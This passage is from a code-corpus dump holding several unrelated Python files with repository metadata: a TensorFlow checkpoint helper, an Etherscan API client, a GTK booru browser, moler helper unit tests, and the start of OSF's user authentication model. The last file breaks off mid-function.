overwrite=False)
dump_in_best_checkpoint_path(config.get_inner_model_config(), "inner_config")
dump_in_best_checkpoint_path(config.get_outer_model_config(), "outer_config")
dump_in_best_checkpoint_path(accuracy, "accuracy")
def _is_previous_accuracy_better(best_checkpoint_path, accuracy):
if not tf.gfile.Exists(best_checkpoint_path):
return False
previous_accuracy_file = os.path.join(best_checkpoint_path, "accuracy")
with tf.gfile.Open(previous_accuracy_file, "rb") as f:
previous_accuracy = pickle.load(f)
return previous_accuracy > accuracy
def evaluate_and_average(session, tensor, num_estimates):
tensor_value_estimates = [session.run(tensor) for _ in range(num_estimates)]
average_tensor_value = sum(tensor_value_estimates) / num_estimates
return average_tensor_value
def evaluate(session, tensor):
# for each class
# for each component (1-64)
#
tensor_value_estimates = session.run(tensor)
return tensor_value_estimates
| 38.230769
| 80
| 0.743796
|
cf507797237d25b174786b64c02891d0bf287bd8
| 2,312
|
py
|
Python
|
safe_transaction_service/contracts/clients/etherscan_api.py
|
peekpi/safe-transaction-service
|
d75008096e6ee9d87dcb274478777b4984f4b71e
|
[
"MIT"
] | 4
|
2021-04-06T02:00:02.000Z
|
2022-03-29T17:45:10.000Z
|
safe_transaction_service/contracts/clients/etherscan_api.py
|
peekpi/safe-transaction-service
|
d75008096e6ee9d87dcb274478777b4984f4b71e
|
[
"MIT"
] | 5
|
2021-06-09T18:47:49.000Z
|
2022-03-12T00:56:46.000Z
|
safe_transaction_service/contracts/clients/etherscan_api.py
|
peekpi/safe-transaction-service
|
d75008096e6ee9d87dcb274478777b4984f4b71e
|
[
"MIT"
] | 4
|
2021-04-06T01:58:26.000Z
|
2022-01-10T18:14:08.000Z
|
import json
import time
from typing import Any, Dict, Optional
from urllib.parse import urljoin
import requests
from gnosis.eth.ethereum_client import EthereumNetwork
class EtherscanApiConfigurationError(Exception):
pass
class RateLimitError(Exception):
pass
class EtherscanApi:
def __init__(self, network: EthereumNetwork, api_key: Optional[str] = None):
self.network = network
self.api_key = api_key
self.base_url = self.get_base_url(network)
if self.base_url is None:
raise EtherscanApiConfigurationError(f'Network {network.name} - {network.value} not supported')
self.http_session = requests.session()
def build_url(self, path: str):
url = urljoin(self.base_url, path)
if self.api_key:
url += f'&apikey={self.api_key}'
return url
def get_base_url(self, network: EthereumNetwork):
if network == EthereumNetwork.MAINNET:
return 'https://api.etherscan.io'
elif network == EthereumNetwork.RINKEBY:
return 'https://api-rinkeby.etherscan.io'
elif network == EthereumNetwork.XDAI:
return 'https://blockscout.com/poa/xdai'
elif network == EthereumNetwork.ENERGY_WEB_CHAIN:
return 'https://explorer.energyweb.org'
elif network == EthereumNetwork.VOLTA:
return 'https://volta-explorer.energyweb.org'
def _get_contract_abi(self, contract_address: str) -> Optional[Dict[str, Any]]:
url = self.build_url(f'api?module=contract&action=getabi&address={contract_address}')
response = self.http_session.get(url)
if response.ok:
response_json = response.json()
result = response_json['result']
if 'Max rate limit reached, please use API Key for higher rate limit' == result:
raise RateLimitError
if response_json['status'] == '1':
return json.loads(result)
def get_contract_abi(self, contract_address: str, retry: bool = True):
for _ in range(3):
try:
return self._get_contract_abi(contract_address)
except RateLimitError as exc:
if not retry:
raise exc
else:
time.sleep(5)
| 34.507463
| 107
| 0.634516
|
0edc082d6980c6cca9aeb6f69acf40ca229a248a
| 1,501
|
py
|
Python
|
browser.py
|
gentlecolts/booru-browse
|
ab9821667d56df9b9730d15ffc2be735622a4c91
|
[
"MIT"
] | null | null | null |
browser.py
|
gentlecolts/booru-browse
|
ab9821667d56df9b9730d15ffc2be735622a4c91
|
[
"MIT"
] | null | null | null |
browser.py
|
gentlecolts/booru-browse
|
ab9821667d56df9b9730d15ffc2be735622a4c91
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
print("Loading resources")
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, GObject, Gdk
from mainwin import booruView
#windows console is a pain about unicode
#import os
#if os.name=='nt':
#import sys
#import codecs
#sys.stdout = codecs.getwriter('utf8')(sys.stdout)
#sys.stderr = codecs.getwriter('utf8')(sys.stderr)
print("Browser is starting")
win=Gtk.Window()
win.connect("delete-event", lambda wid, event:Gtk.main_quit())
win.resize(1280, 720)
win.set_title("Booru Browser")
print("window created, adding content")
booruview=booruView()
#key navigation
navblockers=[Gtk.SearchEntry]
def keyfn(w, e):
keyname=Gdk.keyval_name(e.keyval)
#print(e.keyval, keyname)
if type(w.get_focus()) in navblockers:
#print("cant navigate while entry is selected")
return
if keyname=="Right":
booruview.next(1)
elif keyname=="Left":
booruview.next(-1)
booruview.floater.connect('key_press_event', keyfn)
#win.connect('key_press_event', keyfn)
def clickEvent(w, e):
#print(type(w))
#print(dir(e))
win.set_focus(None)
booruview.connect("button-press-event", clickEvent)
def saveimg(group, win, someint, modifier):
booruview.post.content.saveDialog(win)
accel=Gtk.AccelGroup()
accel.connect(Gdk.keyval_from_name('S'), Gdk.ModifierType.CONTROL_MASK, 0, saveimg)
booruview.floater.add_accel_group(accel)
win.add_accel_group(accel)
win.add(booruview)
win.show()
print("content created, starting program")
GObject.threads_init()
Gtk.main()
| 22.073529
| 83
| 0.747502
|
83a412ef6de603eb75a040f2cf5e94b815ff55fe
| 10,374
|
py
|
Python
|
test/test_helpers.py
|
nokia/moler
|
13cb3d1329a8904ac074f269b8c9ec1955e3ae30
|
[
"BSD-3-Clause"
] | 57
|
2018-02-20T08:16:47.000Z
|
2022-03-28T10:36:57.000Z
|
test/test_helpers.py
|
nokia/moler
|
13cb3d1329a8904ac074f269b8c9ec1955e3ae30
|
[
"BSD-3-Clause"
] | 377
|
2018-07-19T11:56:27.000Z
|
2021-07-09T13:08:12.000Z
|
test/test_helpers.py
|
nokia/moler
|
13cb3d1329a8904ac074f269b8c9ec1955e3ae30
|
[
"BSD-3-Clause"
] | 24
|
2018-04-14T20:49:40.000Z
|
2022-03-29T10:44:26.000Z
|
# -*- coding: utf-8 -*-
"""
Tests for helpers functions/classes.
"""
__author__ = 'Grzegorz Latuszek, Marcin Usielski'
__copyright__ = 'Copyright (C) 2018-2021, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com'
import mock
import pytest
from moler.exceptions import WrongUsage
def test_instance_id_returns_id_in_hex_form_without_0x():
from moler.helpers import instance_id
from six.moves import builtins
# 0xf0a1 == 61601 decimal
with mock.patch.object(builtins, "id", return_value=61601):
instance = "moler object"
assert "0x" not in instance_id(instance)
assert instance_id(instance) == "f0a1"
def test_converterhelper_k():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
bytes_value, value_in_units, unit = converter.to_bytes("2.5K")
assert 2560 == bytes_value
assert 2.5 == value_in_units
assert 'k' == unit
def test_converterhelper_m():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
bytes_value, value_in_units, unit = converter.to_bytes(".3m", False)
assert 300000 == bytes_value
assert 0.3 == value_in_units
assert 'm' == unit
def test_converterhelper_wrong_unit():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
with pytest.raises(ValueError):
converter.to_bytes("3UU", False)
def test_converterhelper_seconds():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
value, value_in_units, unit = converter.to_seconds_str("3m")
assert 180 == value
assert 3 == value_in_units
assert 'm' == unit
def test_converterhelper_number_wrong_format():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
with pytest.raises(ValueError):
converter.to_number(value="abc", raise_exception=True)
val = converter.to_number(value="abc", raise_exception=False)
assert val == 0
def test_converterhelper_number():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
val = converter.to_number(value="1")
assert 1 == val
val = converter.to_number(value="0.1")
assert val == 0.1
def test_converterhelper_seconds_ms():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
value = converter.to_seconds(0.408, "ms")
assert pytest.approx(0.000408, 0.000001) == value
def test_converterhelper_seconds_wrong_unit():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
with pytest.raises(ValueError):
converter.to_seconds_str("3UU")
def test_copy_list():
from moler.helpers import copy_list
src = [1]
dst = copy_list(src, deep_copy=True)
assert src == dst
dst[0] = 2
assert src != dst
def test_copy_dict():
from moler.helpers import copy_dict
src = {'a': 1}
dst = copy_dict(src, deep_copy=True)
assert src == dst
dst['a'] = 2
assert src != dst
def test_regex_helper():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
assert regex_helper is not None
match = regex_helper.match(r"\d+(\D+)\d+", "111ABC222")
assert match is not None
assert match == regex_helper.get_match()
assert regex_helper.group(1) == "ABC"
def test_groups_at_regex_helper():
import re
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
if regex_helper.search_compiled(re.compile(r"(\d+)_([A-Z]+)(\w+),(\d+)"), "111_ABCef,222"):
ones, uppers, lowers, twos = regex_helper.groups()
assert ones == '111'
assert uppers == 'ABC'
assert lowers == 'ef'
assert twos == '222'
def test_search_compiled_none():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.search_compiled(None, '123')
assert "search_compiled is None" in str(exc)
def test_match_compiled_none():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.match_compiled(None, '123')
assert "match_compiled is None" in str(exc)
def test_group_without_match_object():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.group(1)
assert "Nothing was matched before calling" in str(exc)
def test_groups_without_match_object():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.groups()
assert "Nothing was matched before calling" in str(exc)
def test_groupdict_without_match_object():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.groupdict()
assert "Nothing was matched before calling" in str(exc)
def test_all_chars_to_hex():
from moler.helpers import all_chars_to_hex
source = "a\n\rb" + chr(3) + chr(5)
expected_output = r"\x61\x0a\x0d\x62\x03\x05"
output = all_chars_to_hex(source=source)
assert output == expected_output
def test_non_printable_chars_to_hex():
from moler.helpers import non_printable_chars_to_hex
source = "a\n\rb" + chr(3) + chr(5)
expected_output = r"a\x0a\x0db\x03\x05"
output = non_printable_chars_to_hex(source=source)
assert output == expected_output
def test_removal_cursor_visibility_codes():
from moler.helpers import remove_cursor_visibility_codes
line = "\x1B[?25h\x1B[?25llogin\x1B[?25l :\x1B[?12h\x1B[?12l"
output = remove_cursor_visibility_codes(multiline=line)
assert "login :" == output
multiline = "\x1B[?25h\x1B[?25llogin\x1B[?25l :\x1B[?12h\x1B[?12l\n\x1B[?25h\x1B[?25l>"
output2 = remove_cursor_visibility_codes(multiline=multiline)
assert "login :\n>" == output2
def test_removal_fill_spaces_right_codes():
from moler.helpers import remove_fill_spaces_right_codes
full_line = "login:\x1B[300X\x1B[24X\x1B[300C\n"
multiline = "login:\x1B[300X\x1B[24X\x1B[300C\n\x1B[300X\x1B[300C\n"
incomplete_line = "login:\x1B[300X\x1B[300C"
output1 = remove_fill_spaces_right_codes(multiline=full_line)
assert "login:\n" == output1
output2 = remove_fill_spaces_right_codes(multiline=multiline)
assert "login:\n\n" == output2
output3 = remove_fill_spaces_right_codes(multiline=incomplete_line)
assert incomplete_line == output3 # no conversion since no newline
def test_removal_left_wrights_that_were_overwritten():
from moler.helpers import remove_overwritten_left_write
line = "\x1B[300X\x1B[300C\x1B[11;1H\x1B[?25h\x1B[?25l\x1B[HLast login:"
output = remove_overwritten_left_write(multiline=line)
assert "Last login:" == output
line2 = "\x1B[300X\x1B[300C\x1B[11;1H\x1B[?25h\x1B[?25l\x1B[H\x1B[32mLast login:"
output2 = remove_overwritten_left_write(multiline=line2)
assert "\x1B[32mLast login:" == output2
line3 = "\x1B[300X\x1B[300C\x1B[11;1H\x1B[?25h\x1B[?25l\x1B[H login:"
output3 = remove_overwritten_left_write(multiline=line3)
assert " login:" == output3
multiline = "\x1B[300X\x1B[300C\x1B[11;1H\x1B[?25h\x1B[?25l\x1B[H login:\nabc>\x1B[H\x1B[300X\nabc>\x1B[H password:"
output4 = remove_overwritten_left_write(multiline=multiline)
assert " login:\n\x1B[300X\n password:" == output4
def test_removal_text_formating_codes():
from moler.helpers import remove_text_formatting_codes
line = "\x1B[32muser-lab0@PLKR-SC5G-PC11 \x1B[33m~\x1B[m"
output = remove_text_formatting_codes(multiline=line)
assert "user-lab0@PLKR-SC5G-PC11 ~" == output
multiline = "\x1B[32muser-lab0@PLKR-SC5G-PC11 \x1B[33m~\x1B[m$ adb shell\n\x1B[32mmsmnile:/ #\x1B[m"
output2 = remove_text_formatting_codes(multiline=multiline)
assert "user-lab0@PLKR-SC5G-PC11 ~$ adb shell\nmsmnile:/ #" == output2
def test_removal_window_title_codes():
from moler.helpers import remove_window_title_codes
line = "\x1B]0;~\x07"
output = remove_window_title_codes(multiline=line)
assert "" == output
multiline = "\x1B]0;~\x07\n\x1B]2;~\x07"
output2 = remove_window_title_codes(multiline=multiline)
assert "\n" == output2
def test_convert_to_int():
from moler.helpers import convert_to_int, compare_objects
sample_input = {'KEY': [{'KEY1 ': {'contextInfoList': ['sample', '2', '4'],
'someIds': '0'}},
{'KEY2': {'contextInfoList': [],
'num': '20',
'poolId': '1',
'user': {
'contextType': 'sample',
'numContexts': '3',
'num': '4'}}}]}
expected_output = {'KEY': [{'KEY1 ': {'contextInfoList': ['sample', 2, 4],
'someIds': 0}},
{'KEY2': {'contextInfoList': [],
'num': 20,
'poolId': 1,
'user': {
'contextType': 'sample',
'numContexts': 3,
'num': 4}}}]}
assert not compare_objects(convert_to_int(sample_input), expected_output)
def test_convert_to_number_int():
from moler.helpers import convert_to_number
expected = 4
result = convert_to_number("{}".format(expected))
assert expected == result
def test_convert_to_number_float():
from moler.helpers import convert_to_number
expected = 3.2
result = convert_to_number("{}".format(expected))
assert expected == result
def test_convert_to_number_str():
from moler.helpers import convert_to_number
expected = "not a number"
result = convert_to_number(expected)
assert expected == result
| 35.649485
| 120
| 0.671486
|
b3488af0beac61aa2a0e00049b3125d922b79367
| 55,790
|
py
|
Python
|
framework/auth/core.py
|
DanielSBrown/osf.io
|
98dda2ac237377197acacce78274bc0a4ce8f303
|
[
"Apache-2.0"
] | null | null | null |
framework/auth/core.py
|
DanielSBrown/osf.io
|
98dda2ac237377197acacce78274bc0a4ce8f303
|
[
"Apache-2.0"
] | null | null | null |
framework/auth/core.py
|
DanielSBrown/osf.io
|
98dda2ac237377197acacce78274bc0a4ce8f303
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime as dt
import itertools
import logging
import re
import urlparse
from copy import deepcopy
import bson
import pytz
import itsdangerous
from modularodm import fields, Q
from modularodm.exceptions import NoResultsFound, ValidationError, ValidationValueError, QueryException
from modularodm.validators import URLValidator
import framework
from framework import analytics
from framework.addons import AddonModelMixin
from framework.auth import signals, utils
from framework.auth.exceptions import (ChangePasswordError, ExpiredTokenError, InvalidTokenError,
MergeConfirmedRequiredError, MergeConflictError)
from framework.bcrypt import generate_password_hash, check_password_hash
from framework.exceptions import PermissionsError
from framework.guid.model import GuidStoredObject
from framework.mongo.validators import string_required
from framework.sentry import log_exception
from framework.sessions import session
from framework.sessions.model import Session
from framework.sessions.utils import remove_sessions_for_user
from website import mails, settings, filters, security
name_formatters = {
'long': lambda user: user.fullname,
'surname': lambda user: user.family_name if user.family_name else user.fullname,
'initials': lambda user: u'{surname}, {initial}.'.format(
surname=user.family_name,
initial=user.given_name_initial,
),
}
logger = logging.getLogger(__name__)
# Hide implementation of token generation
def generate_confirm_token():
return security.random_string(30)
def generate_claim_token():
return security.random_string(30)
def generate_verification_key():
return security.random_string(30)
def validate_history_item(item):
string_required(item.get('institution'))
startMonth = item.get('startMonth')
startYear = item.get('startYear')
endMonth = item.get('endMonth')
endYear = item.get('endYear')
validate_year(startYear)
validate_year(endYear)
if startYear and endYear:
if endYear < startYear:
raise ValidationValueError('End date must be later than start date.')
elif endYear == startYear:
if endMonth and startMonth and endMonth < startMonth:
raise ValidationValueError('End date must be later than start date.')
def validate_year(item):
if item:
try:
int(item)
except ValueError:
raise ValidationValueError('Please enter a valid year.')
else:
if len(item) != 4:
raise ValidationValueError('Please enter a valid year.')
validate_url = URLValidator()
def validate_profile_websites(profile_websites):
for value in profile_websites or []:
try:
validate_url(value)
except ValidationError:
# Reraise with a better message
raise ValidationError('Invalid personal URL.')
def validate_social(value):
validate_profile_websites(value.get('profileWebsites'))
# TODO - rename to _get_current_user_from_session /HRYBACKI
def _get_current_user():
uid = session._get_current_object() and session.data.get('auth_user_id')
return User.load(uid)
# TODO: This should be a class method of User?
def get_user(email=None, password=None, verification_key=None):
"""Get an instance of User matching the provided params.
:return: The instance of User requested
:rtype: User or None
"""
# tag: database
if password and not email:
raise AssertionError('If a password is provided, an email must also '
'be provided.')
query_list = []
if email:
email = email.strip().lower()
query_list.append(Q('emails', 'eq', email) | Q('username', 'eq', email))
if password:
password = password.strip()
try:
query = query_list[0]
for query_part in query_list[1:]:
query = query & query_part
user = User.find_one(query)
except Exception as err:
logger.error(err)
user = None
if user and not user.check_password(password):
return False
return user
if verification_key:
query_list.append(Q('verification_key', 'eq', verification_key))
try:
query = query_list[0]
for query_part in query_list[1:]:
query = query & query_part
user = User.find_one(query)
return user
except Exception as err:
logger.error(err)
return None
class Auth(object):
def __init__(self, user=None, api_node=None,
private_key=None):
self.user = user
self.api_node = api_node
self.private_key = private_key
def __repr__(self):
return ('<Auth(user="{self.user}", '
'private_key={self.private_key})>').format(self=self)
@property
def logged_in(self):
return self.user is not None
@property
def private_link(self):
if not self.private_key:
return None
try:
# Avoid circular import
from website.project.model import PrivateLink
private_link = PrivateLink.find_one(
Q('key', 'eq', self.private_key)
)
if private_link.is_deleted:
return None
except QueryException:
return None
return private_link
@classmethod
def from_kwargs(cls, request_args, kwargs):
user = request_args.get('user') or kwargs.get('user') or _get_current_user()
private_key = request_args.get('view_only')
return cls(
user=user,
private_key=private_key,
)
class User(GuidStoredObject, AddonModelMixin):
# Node fields that trigger an update to the search engine on save
SEARCH_UPDATE_FIELDS = {
'fullname',
'given_name',
'middle_names',
'family_name',
'suffix',
'merged_by',
'date_disabled',
'date_confirmed',
'jobs',
'schools',
'social',
}
# TODO: Add SEARCH_UPDATE_NODE_FIELDS, for fields that should trigger a
# search update for all nodes to which the user is a contributor.
SOCIAL_FIELDS = {
'orcid': u'http://orcid.org/{}',
'github': u'http://github.com/{}',
'scholar': u'http://scholar.google.com/citations?user={}',
'twitter': u'http://twitter.com/{}',
'profileWebsites': [],
'linkedIn': u'https://www.linkedin.com/{}',
'impactStory': u'https://impactstory.org/{}',
'researcherId': u'http://researcherid.com/rid/{}',
'researchGate': u'https://researchgate.net/profile/{}',
'academiaInstitution': u'https://{}',
'academiaProfileID': u'.academia.edu/{}',
'baiduScholar': u'http://xueshu.baidu.com/scholarID/{}'
}
# This is a GuidStoredObject, so this will be a GUID.
_id = fields.StringField(primary=True)
# The primary email address for the account.
# This value is unique, but multiple "None" records exist for:
# * unregistered contributors where an email address was not provided.
# TODO: Update mailchimp subscription on username change in user.save()
username = fields.StringField(required=False, unique=True, index=True)
# Hashed. Use `User.set_password` and `User.check_password`
password = fields.StringField()
fullname = fields.StringField(required=True, validate=string_required)
# user has taken action to register the account
is_registered = fields.BooleanField(index=True)
# user has claimed the account
# TODO: This should be retired - it always reflects is_registered.
# While a few entries exist where this is not the case, they appear to be
# the result of a bug, as they were all created over a small time span.
is_claimed = fields.BooleanField(default=False, index=True)
# a list of strings - for internal use
system_tags = fields.StringField(list=True)
# security emails that have been sent
# TODO: This should be removed and/or merged with system_tags
security_messages = fields.DictionaryField()
# Format: {
# <message label>: <datetime>
# ...
# }
# user was invited (as opposed to registered unprompted)
is_invited = fields.BooleanField(default=False, index=True)
# Per-project unclaimed user data:
# TODO: add validation
unclaimed_records = fields.DictionaryField(required=False)
# Format: {
# <project_id>: {
# 'name': <name that referrer provided>,
# 'referrer_id': <user ID of referrer>,
# 'token': <token used for verification urls>,
# 'email': <email the referrer provided or None>,
# 'claimer_email': <email the claimer entered or None>,
# 'last_sent': <timestamp of last email sent to referrer or None>
# }
# ...
# }
# Time of last sent notification email to newly added contributors
# Format : {
# <project_id>: {
# 'last_sent': time.time()
# }
# ...
# }
contributor_added_email_records = fields.DictionaryField(default=dict)
# The user into which this account was merged
merged_by = fields.ForeignField('user', default=None, index=True)
# verification key used for resetting password
verification_key = fields.StringField()
email_last_sent = fields.DateTimeField()
# confirmed emails
# emails should be stripped of whitespace and lower-cased before appending
# TODO: Add validator to ensure an email address only exists once across
# all User's email lists
emails = fields.StringField(list=True)
# email verification tokens
# see also ``unconfirmed_emails``
email_verifications = fields.DictionaryField(default=dict)
# Format: {
# <token> : {'email': <email address>,
# 'expiration': <datetime>}
# }
# TODO remove this field once migration (scripts/migration/migrate_mailing_lists_to_mailchimp_fields.py)
# has been run. This field is deprecated and replaced with mailchimp_mailing_lists
mailing_lists = fields.DictionaryField()
# email lists to which the user has chosen a subscription setting
mailchimp_mailing_lists = fields.DictionaryField()
# Format: {
# 'list1': True,
# 'list2: False,
# ...
# }
# email lists to which the user has chosen a subscription setting, being sent from osf, rather than mailchimp
osf_mailing_lists = fields.DictionaryField(default=lambda: {settings.OSF_HELP_LIST: True})
# Format: {
# 'list1': True,
# 'list2: False,
# ...
# }
# the date this user was registered
# TODO: consider removal - this can be derived from date_registered
date_registered = fields.DateTimeField(auto_now_add=dt.datetime.utcnow,
index=True)
# watched nodes are stored via a list of WatchConfigs
watched = fields.ForeignField('WatchConfig', list=True)
# list of collaborators that this user recently added to nodes as a contributor
recently_added = fields.ForeignField('user', list=True)
# Attached external accounts (OAuth)
external_accounts = fields.ForeignField('externalaccount', list=True)
# CSL names
given_name = fields.StringField()
middle_names = fields.StringField()
family_name = fields.StringField()
suffix = fields.StringField()
# Employment history
jobs = fields.DictionaryField(list=True, validate=validate_history_item)
# Format: {
# 'title': <position or job title>,
# 'institution': <institution or organization>,
# 'department': <department>,
# 'location': <location>,
# 'startMonth': <start month>,
# 'startYear': <start year>,
# 'endMonth': <end month>,
# 'endYear': <end year>,
# 'ongoing: <boolean>
# }
# Educational history
schools = fields.DictionaryField(list=True, validate=validate_history_item)
# Format: {
# 'degree': <position or job title>,
# 'institution': <institution or organization>,
# 'department': <department>,
# 'location': <location>,
# 'startMonth': <start month>,
# 'startYear': <start year>,
# 'endMonth': <end month>,
# 'endYear': <end year>,
# 'ongoing: <boolean>
# }
# Social links
social = fields.DictionaryField(validate=validate_social)
# Format: {
# 'profileWebsites': <list of profile websites>
# 'twitter': <twitter id>,
# }
# hashed password used to authenticate to Piwik
piwik_token = fields.StringField()
# date the user last sent a request
date_last_login = fields.DateTimeField()
# date the user first successfully confirmed an email address
date_confirmed = fields.DateTimeField(index=True)
# When the user was disabled.
date_disabled = fields.DateTimeField(index=True)
# when comments were last viewed
comments_viewed_timestamp = fields.DictionaryField()
# Format: {
# 'Comment.root_target._id': 'timestamp',
# ...
# }
# timezone for user's locale (e.g. 'America/New_York')
timezone = fields.StringField(default='Etc/UTC')
# user language and locale data (e.g. 'en_US')
locale = fields.StringField(default='en_US')
# whether the user has requested to deactivate their account
requested_deactivation = fields.BooleanField(default=False)
# dictionary of projects a user has changed the setting on
notifications_configured = fields.DictionaryField()
# Format: {
# <node.id>: True
# ...
# }
# If this user was created through the API,
# keep track of who added them.
registered_by = fields.ForeignField('user', default=None, index=True)
_meta = {'optimistic': True}
def __repr__(self):
return '<User({0!r}) with id {1!r}>'.format(self.username, self._id)
def __str__(self):
return self.fullname.encode('ascii', 'replace')
__unicode__ = __str__
# For compatibility with Django auth
@property
def pk(self):
return self._id
@property
def email(self):
return self.username
def is_authenticated(self): # Needed for django compat
return True
def is_anonymous(self):
return False
@property
def absolute_api_v2_url(self):
from website import util
return util.api_v2_url('users/{}/'.format(self.pk))
# used by django and DRF
def get_absolute_url(self):
if not self.is_registered:
return None
return self.absolute_api_v2_url
@classmethod
def create_unregistered(cls, fullname, email=None):
"""Create a new unregistered user.
"""
user = cls(
username=email,
fullname=fullname,
is_invited=True,
is_registered=False,
)
user.update_guessed_names()
return user
@classmethod
def create(cls, username, password, fullname):
user = cls(
username=username,
fullname=fullname,
)
user.update_guessed_names()
user.set_password(password)
return user
@classmethod
def create_unconfirmed(cls, username, password, fullname, do_confirm=True,
campaign=None):
"""Create a new user who has begun registration but needs to verify
their primary email address (username).
"""
user = cls.create(username, password, fullname)
user.add_unconfirmed_email(username)
user.is_registered = False
if campaign:
# needed to prevent cirular import
from framework.auth.campaigns import system_tag_for_campaign # skipci
user.system_tags.append(system_tag_for_campaign(campaign))
return user
@classmethod
def create_confirmed(cls, username, password, fullname):
user = cls.create(username, password, fullname)
user.is_registered = True
user.is_claimed = True
user.date_confirmed = user.date_registered
user.emails.append(username)
return user
@classmethod
def from_cookie(cls, cookie, secret=None):
"""Attempt to load a user from their signed cookie
:returns: None if a user cannot be loaded else User
"""
if not cookie:
return None
secret = secret or settings.SECRET_KEY
try:
token = itsdangerous.Signer(secret).unsign(cookie)
except itsdangerous.BadSignature:
return None
user_session = Session.load(token)
if user_session is None:
return None
return cls.load(user_session.data.get('auth_user_id'))
def get_or_create_cookie(self, secret=None):
"""Find the cookie for the given user
Create a new session if no cookie is found
:param str secret: The key to sign the cookie with
:returns: The signed cookie
"""
secret = secret or settings.SECRET_KEY
sessions = Session.find(
Q('data.auth_user_id', 'eq', self._id)
).sort(
'-date_modified'
).limit(1)
if sessions.count() > 0:
user_session = sessions[0]
else:
user_session = Session(data={
'auth_user_id': self._id,
'auth_user_username': self.username,
'auth_user_fullname': self.fullname,
})
user_session.save()
signer = itsdangerous.Signer(secret)
return signer.sign(user_session._id)
def update_guessed_names(self):
"""Updates the CSL name fields inferred from the the full name.
"""
parsed = utils.impute_names(self.fullname)
self.given_name = parsed['given']
self.middle_names = parsed['middle']
self.family_name = parsed['family']
self.suffix = parsed['suffix']
def register(self, username, password=None):
"""Registers the user.
"""
self.username = username
if password:
self.set_password(password)
if username not in self.emails:
self.emails.append(username)
self.is_registered = True
self.is_claimed = True
self.date_confirmed = dt.datetime.utcnow()
self.update_search()
self.update_search_nodes()
# Emit signal that a user has confirmed
signals.user_confirmed.send(self)
return self
def add_unclaimed_record(self, node, referrer, given_name, email=None):
"""Add a new project entry in the unclaimed records dictionary.
:param Node node: Node this unclaimed user was added to.
:param User referrer: User who referred this user.
:param str given_name: The full name that the referrer gave for this user.
:param str email: The given email address.
:returns: The added record
"""
if not node.can_edit(user=referrer):
raise PermissionsError('Referrer does not have permission to add a contributor '
'to project {0}'.format(node._primary_key))
project_id = node._primary_key
referrer_id = referrer._primary_key
if email:
clean_email = email.lower().strip()
else:
clean_email = None
record = {
'name': given_name,
'referrer_id': referrer_id,
'token': generate_confirm_token(),
'email': clean_email
}
self.unclaimed_records[project_id] = record
return record
def display_full_name(self, node=None):
"""Return the full name , as it would display in a contributor list for a
given node.
NOTE: Unclaimed users may have a different name for different nodes.
"""
if node:
unclaimed_data = self.unclaimed_records.get(node._primary_key, None)
if unclaimed_data:
return unclaimed_data['name']
return self.fullname
@property
def is_active(self):
"""Returns True if the user is active. The user must have activated
their account, must not be deleted, suspended, etc.
:return: bool
"""
return (self.is_registered and
self.password is not None and
not self.is_merged and
not self.is_disabled and
self.is_confirmed)
def get_unclaimed_record(self, project_id):
"""Get an unclaimed record for a given project_id.
:raises: ValueError if there is no record for the given project.
"""
try:
return self.unclaimed_records[project_id]
except KeyError: # reraise as ValueError
raise ValueError('No unclaimed record for user {self._id} on node {project_id}'
.format(**locals()))
def get_claim_url(self, project_id, external=False):
"""Return the URL that an unclaimed user should use to claim their
account. Return ``None`` if there is no unclaimed_record for the given
project ID.
:param project_id: The project ID for the unclaimed record
:raises: ValueError if a record doesn't exist for the given project ID
:rtype: dict
:returns: The unclaimed record for the project
"""
uid = self._primary_key
base_url = settings.DOMAIN if external else '/'
unclaimed_record = self.get_unclaimed_record(project_id)
token = unclaimed_record['token']
return '{base_url}user/{uid}/{project_id}/claim/?token={token}'\
.format(**locals())
def set_password(self, raw_password, notify=True):
"""Set the password for this user to the hash of ``raw_password``.
If this is a new user, we're done. If this is a password change,
then email the user about the change and clear all the old sessions
so that users will have to log in again with the new password.
:param raw_password: the plaintext value of the new password
:param notify: Only meant for unit tests to keep extra notifications from being sent
:rtype: list
:returns: Changed fields from the user save
"""
had_existing_password = bool(self.password)
self.password = generate_password_hash(raw_password)
if self.username == raw_password:
raise ChangePasswordError(['Password cannot be the same as your email address'])
if had_existing_password and notify:
mails.send_mail(
to_addr=self.username,
mail=mails.PASSWORD_RESET,
mimetype='plain',
user=self
)
remove_sessions_for_user(self)
def check_password(self, raw_password):
"""Return a boolean of whether ``raw_password`` was correct."""
if not self.password or not raw_password:
return False
return check_password_hash(self.password, raw_password)
@property
def csl_given_name(self):
parts = [self.given_name]
if self.middle_names:
parts.extend(each[0] for each in re.split(r'\s+', self.middle_names))
return ' '.join(parts)
@property
def csl_name(self):
return {
'family': self.family_name,
'given': self.csl_given_name,
}
@property
def created(self):
from website.project.model import Node
return Node.find(Q('creator', 'eq', self._id))
# TODO: This should not be on the User object.
def change_password(self, raw_old_password, raw_new_password, raw_confirm_password):
"""Change the password for this user to the hash of ``raw_new_password``."""
raw_old_password = (raw_old_password or '').strip()
raw_new_password = (raw_new_password or '').strip()
raw_confirm_password = (raw_confirm_password or '').strip()
# TODO: Move validation to set_password
issues = []
if not self.check_password(raw_old_password):
